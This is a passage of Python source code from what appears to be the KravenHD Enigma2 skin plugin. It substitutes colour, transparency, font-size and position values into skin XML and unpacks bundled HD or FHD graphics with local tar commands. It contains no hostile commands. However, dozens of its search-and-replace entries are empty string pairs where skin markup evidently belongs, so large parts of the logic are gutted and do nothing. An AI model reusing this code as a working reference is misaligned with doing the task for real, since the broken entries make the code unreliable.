MSNWeather)\n\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg5\" value=\"#00000000', 'name=\"Kravenbg5\" value=\"#' + \"80\" + self.skincolorbackgroundcolor])\n\n\t\t### Background6 (Popups, bsWindow)\n\t\tif config.plugins.KravenHD.PopupStyle.value in (\"popup-grad-trans\", \"popup-box-trans\"):\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg6\" value=\"#00000000', 'name=\"Kravenbg6\" value=\"#' + \"3F\" + self.skincolorbackgroundcolor])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"Kravenbg6\" value=\"#00000000', 'name=\"Kravenbg6\" value=\"#' + \"00\" + self.skincolorbackgroundcolor])\n\n\t\t### Background graphics\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.BackgroundColor.value in (\"gradient\", \"texture\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.BackgroundColor.value in (\"gradient\", \"texture\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### ECM. Transparency of infobar, color of text\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenECMbg\" value=\"#F1325698', 'name=\"KravenECMbg\" value=\"#' + config.plugins.KravenHD.InfobarColorTrans.value + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ECMLineAntialias.value)])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenECMbg\" value=\"#F1325698', 'name=\"KravenECMbg\" value=\"#' + config.plugins.KravenHD.InfobarColorTrans.value + self.skincolorinfobarcolor])\n\n\t\t### Infobar. Transparency of infobar, color of infobar\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg\" value=\"#001B1775', 'name=\"KravenIBbg\" value=\"#' + config.plugins.KravenHD.InfobarColorTrans.value + self.skincolorinfobarcolor])\n\n\t\t### Screens. Lower Transparency of infobar and background, color of infobar or color of background, if ibar invisible\n\t\tif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg2\" value=\"#00000000', 'name=\"KravenIBbg2\" value=\"#' + self.calcTransparency(config.plugins.KravenHD.InfobarColorTrans.value, config.plugins.KravenHD.BackgroundColorTrans.value) + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ScreensAntialias.value)])\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#' + self.calcTransparency(config.plugins.KravenHD.InfobarColorTrans.value, config.plugins.KravenHD.BackgroundColorTrans.value) + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ScreensAntialias.value)])\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg4\" value=\"#00000000', 'name=\"KravenIBbg4\" value=\"#' + self.calcTransparency(config.plugins.KravenHD.InfobarColorTrans.value, config.plugins.KravenHD.ChannelSelectionTrans.value) + self.calcBrightness(self.skincolorinfobarcolor, config.plugins.KravenHD.ScreensAntialias.value)])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg2\" value=\"#00000000', 'name=\"KravenIBbg2\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorinfobarcolor])\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg4\" value=\"#00000000', 'name=\"KravenIBbg4\" value=\"#' + config.plugins.KravenHD.ChannelSelectionTrans.value + self.skincolorinfobarcolor])\n\t\t\t\tif self.actMenustyle in (\"logo\", \"metrix-icons\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorinfobarcolor])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#00' + self.skincolorinfobarcolor])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg5\" value=\"#00000000', 'name=\"KravenIBbg5\" value=\"#00' + self.skincolorinfobarcolor])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg2\" value=\"#00000000', 'name=\"KravenIBbg2\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg4\" value=\"#00000000', 'name=\"KravenIBbg4\" value=\"#' + config.plugins.KravenHD.ChannelSelectionTrans.value + self.skincolorbackgroundcolor])\n\t\t\tif self.actMenustyle in (\"logo\", \"metrix-icons\"):\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#' + config.plugins.KravenHD.BackgroundColorTrans.value + self.skincolorbackgroundcolor])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg3\" value=\"#00000000', 'name=\"KravenIBbg3\" value=\"#00' + self.skincolorbackgroundcolor])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBbg5\" value=\"#00000000', 'name=\"KravenIBbg5\" value=\"#00' + self.skincolorbackgroundcolor])\n\n\t\t### Menu\n\t\tif not self.actChannelselectionstyle in (\"channelselection-style-minitv2\", \"channelselection-style-minitv22\", \"channelselection-style-minitv33\", \"channelselection-style-nobile-minitv33\", \"channelselection-style-minitv3\", \"channelselection-style-nobile-minitv3\"):\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDMenuPig\"', 'render=\"Pig\"'])\n\n\t\tif self.actMenustyle == \"minitv\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actMenustyle == \"logo\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif self.actMenustyle == \"metrix-icons\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### check/install graphics (HD / FHD)\n\t\tgraphpackfile = \"/usr/share/enigma2/KravenHD/graphpackfile\"\n\t\tgraphpackname = \" \"\n\t\tif fileExists(graphpackfile):\n\t\t\tpFile = open(graphpackfile, \"r\")\n\t\t\tfor line in pFile:\n\t\t\t\tgraphpackname = line.strip('\\n')\n\t\t\tpFile.close()\n\t\t\tif graphpackname != config.plugins.KravenHD.SkinResolution.value:\n\t\t\t\tconsole1 = eConsoleAppContainer()\n\t\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\t\tconsole1.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/HD/share.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\t\t\tprint (\"KravenPlugin: HD graphics now installed\")\n\t\t\t\telse:\n\t\t\t\t\tconsole1.execute(\"tar xf /usr/lib/enigma2/python/Plugins/Extensions/KravenHD/data/FHD/share.tar.gz -C /usr/share/enigma2/KravenHD/\")\n\t\t\t\t\tprint (\"KravenPlugin: FHD graphics now installed\")\n\t\t\telse:\n\t\t\t\tprint (\"KravenPlugin: No need to install other graphics\")\n\n\t\t### Mainmenu Fontsize\n\t\tif config.plugins.KravenHD.MainmenuFontsize.value == \"mainmenu-small\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.MainmenuFontsize.value == \"mainmenu-middle\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar. Background-Style\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\n\t\t\t### Infobar - Background\n\t\t\tself.skinSearchAndReplace.append(['', 'zPosition=\"-8\" />'])\n\n\t\t\t### Infobar - Line\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenIBLine\" value=\"#00ffffff', 'name=\"KravenIBLine\" value=\"#00' + config.plugins.KravenHD.IBLine.value])\n\n\t\t\t### Infobar\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### NetatmoBar - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### SIB - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### clock-android - ibar-Position\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\") and self.actClockstyle == \"clock-android\":\n\t\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,576\" size=\"1280,144\"', 'position=\"0,566\" size=\"1280,154\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,576\" size=\"1280,2\"', 'position=\"0,566\" size=\"1280,2\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,580\" size=\"1280,140\"', 'position=\"0,566\" size=\"1280,154\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,580\" size=\"1280,2\"', 'position=\"0,566\" size=\"1280,2\"'])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,864\" size=\"1920,216\"', 'position=\"0,849\" size=\"1920,231\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,864\" size=\"1920,3\"', 'position=\"0,849\" size=\"1920,3\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,870\" size=\"1920,210\"', 'position=\"0,849\" size=\"1920,231\"'])\n\t\t\t\t\tself.skinSearchAndReplace.append(['position=\"0,870\" size=\"1920,3\"', 'position=\"0,849\" size=\"1920,3\"'])\n\n\t\t\t### EMCMediaCenter, MoviePlayer, DVDPlayer - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### EPGSelectionEPGBar - Background\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### ChannelSelectionRadio\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### RadioInfoBar\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### GraphicalInfoBarEPG, QuickEPG\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### InfoBarEventView\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### MediaPortal-Player\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telse:\n\t\t\t### Infobar\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t\t### MediaPortal-Player\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Font Colors\n\t\tself.skinSearchAndReplace.append(['name=\"KravenFont1\" value=\"#00ffffff', 'name=\"KravenFont1\" value=\"#00' + config.plugins.KravenHD.Font1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenFont2\" value=\"#00F0A30A', 'name=\"KravenFont2\" value=\"#00' + config.plugins.KravenHD.Font2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"foreground\" value=\"#00dddddd', 'name=\"foreground\" value=\"#00' + config.plugins.KravenHD.Font1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBFont1\" value=\"#00ffffff', 'name=\"KravenIBFont1\" value=\"#00' + config.plugins.KravenHD.IBFont1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBFont2\" value=\"#00F0A30A', 'name=\"KravenIBFont2\" value=\"#00' + config.plugins.KravenHD.IBFont2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBGFont1\" value=\"#00ffffff', 'name=\"KravenIBGFont1\" value=\"#00' + config.plugins.KravenHD.IBFont1.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenIBGFont2\" value=\"#00F0A30A', 'name=\"KravenIBGFont2\" value=\"#00' + config.plugins.KravenHD.IBFont2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenPermanentClock\" value=\"#00ffffff', 'name=\"KravenPermanentClock\" value=\"#00' + config.plugins.KravenHD.PermanentClockFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenSelFont\" value=\"#00ffffff', 'name=\"KravenSelFont\" value=\"#00' + config.plugins.KravenHD.SelectionFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenSelection\" value=\"#000050EF', 'name=\"KravenSelection\" value=\"#00' + config.plugins.KravenHD.SelectionBackground.value])\n\t\tif config.plugins.KravenHD.EMCSelectionColors.value == \"global\":\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelFont\" value=\"#00ffffff', 'name=\"KravenEMCSelFont\" value=\"#00' + config.plugins.KravenHD.SelectionFont.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelection\" value=\"#000050EF', 'name=\"KravenEMCSelection\" value=\"#00' + config.plugins.KravenHD.SelectionBackground.value])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelFont\" value=\"#00ffffff', 'name=\"KravenEMCSelFont\" value=\"#00' + config.plugins.KravenHD.EMCSelectionFont.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenEMCSelection\" value=\"#000050EF', 'name=\"KravenEMCSelection\" value=\"#00' + config.plugins.KravenHD.EMCSelectionBackground.value])\n\t\tself.skinSearchAndReplace.append(['name=\"selectedFG\" value=\"#00ffffff', 'name=\"selectedFG\" value=\"#00' + config.plugins.KravenHD.SelectionFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenMarked\" value=\"#00ffffff', 'name=\"KravenMarked\" value=\"#00' + config.plugins.KravenHD.MarkedFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenECM\" value=\"#00ffffff', 'name=\"KravenECM\" value=\"#00' + config.plugins.KravenHD.ECMFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenName\" value=\"#00ffffff', 'name=\"KravenName\" value=\"#00' + config.plugins.KravenHD.ChannelnameFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenButton\" value=\"#00ffffff', 'name=\"KravenButton\" value=\"#00' + config.plugins.KravenHD.ButtonText.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenAndroid\" value=\"#00ffffff', 'name=\"KravenAndroid\" value=\"#00' + config.plugins.KravenHD.Android.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenAndroid2\" value=\"#00ffffff', 'name=\"KravenAndroid2\" value=\"#00' + config.plugins.KravenHD.Android2.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenPrime\" value=\"#0070AD11', 'name=\"KravenPrime\" value=\"#00' + config.plugins.KravenHD.PrimetimeFont.value])\n\t\tself.skinSearchAndReplace.append(['name=\"KravenMainmenuHorTitleFont\" value=\"#00999999', 'name=\"KravenMainmenuHorTitleFont\" value=\"#00' + config.plugins.KravenHD.MainmenuHorTitleFont.value])\n\n\t\t### Infobar (Serviceevent) Font-Size\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.IBFontSize.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,553\" size=\"500,38\"', 'font=\"Regular;22\" position=\"545,560\" size=\"500,27\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,643\" size=\"393,38\"', 'font=\"Regular;22\" position=\"545,650\" size=\"393,27\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,526\" size=\"500,38\"', 'font=\"Regular;22\" position=\"545,533\" size=\"500,27\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,616\" size=\"393,38\"', 'font=\"Regular;22\" position=\"545,623\" size=\"393,27\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"438,614\" size=\"472,38\"', 'font=\"Regular;22\" position=\"438,621\" size=\"472,27\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"510,666\" size=\"437,38\"', 'font=\"Regular;22\" position=\"510,673\" size=\"437,27\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,614\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,621\" size=\"481,27\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,666\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,673\" size=\"481,27\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,558\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,565\" size=\"481,27\"']) # X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,649\" size=\"481,38\"', 'font=\"Regular;22\" position=\"430,656\" size=\"481,27\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,584\" size=\"708,38\"', 'font=\"Regular;22\" position=\"199,591\" size=\"708,27\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,636\" size=\"708,38\"', 'font=\"Regular;22\" position=\"199,643\" size=\"708,27\"']) # no picon next\n\t\t\telif config.plugins.KravenHD.IBFontSize.value == \"middle\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,553\" size=\"500,38\"', 'font=\"Regular;26\" position=\"545,556\" size=\"500,33\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,643\" size=\"393,38\"', 'font=\"Regular;26\" position=\"545,646\" size=\"393,33\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,526\" size=\"500,38\"', 'font=\"Regular;26\" position=\"545,529\" size=\"500,33\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"545,616\" size=\"393,38\"', 'font=\"Regular;26\" position=\"545,619\" size=\"393,33\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"438,614\" size=\"472,38\"', 'font=\"Regular;26\" position=\"438,617\" size=\"472,33\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"510,666\" size=\"437,38\"', 'font=\"Regular;26\" position=\"510,669\" size=\"437,33\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,614\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,617\" size=\"481,33\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,666\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,669\" size=\"481,33\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,558\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,561\" size=\"481,33\"']) # X1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"430,649\" size=\"481,38\"', 'font=\"Regular;26\" position=\"430,652\" size=\"481,33\"']) # X1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,584\" size=\"708,38\"', 'font=\"Regular;26\" position=\"199,587\" size=\"708,33\"']) # no picon now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;30\" position=\"199,636\" size=\"708,38\"', 'font=\"Regular;26\" position=\"199,639\" size=\"708,33\"']) # no picon next\n\t\telse:\n\t\t\tif config.plugins.KravenHD.IBFontSize.value == \"small\":\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,830\" size=\"750,55\"', 'font=\"Regular;33\" position=\"817,839\" size=\"750,42\"']) # ZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,965\" size=\"589,55\"', 'font=\"Regular;33\" position=\"817,974\" size=\"589,42\"']) # ZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,790\" size=\"750,55\"', 'font=\"Regular;33\" position=\"817,799\" size=\"750,42\"']) # ZZZ1 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"817,925\" size=\"589,55\"', 'font=\"Regular;33\" position=\"817,931\" size=\"589,42\"']) # ZZZ1 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"657,921\" size=\"708,55\"', 'font=\"Regular;33\" position=\"657,930\" size=\"708,42\"']) # ZZ2, ZZ3 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"765,999\" size=\"655,55\"', 'font=\"Regular;33\" position=\"765,1008\" size=\"655,42\"']) # ZZ3 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,921\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,930\" size=\"722,42\"']) # X2, X3, Z1, Z2 now\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,999\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,1008\" size=\"722,42\"']) # X2, X3, Z1, Z2 next\n\t\t\t\tself.skinSearchAndReplace.append(['font=\"Regular;45\" position=\"644,837\" size=\"722,55\"', 'font=\"Regular;33\" position=\"644,846\" size=\"722,42\"']) # 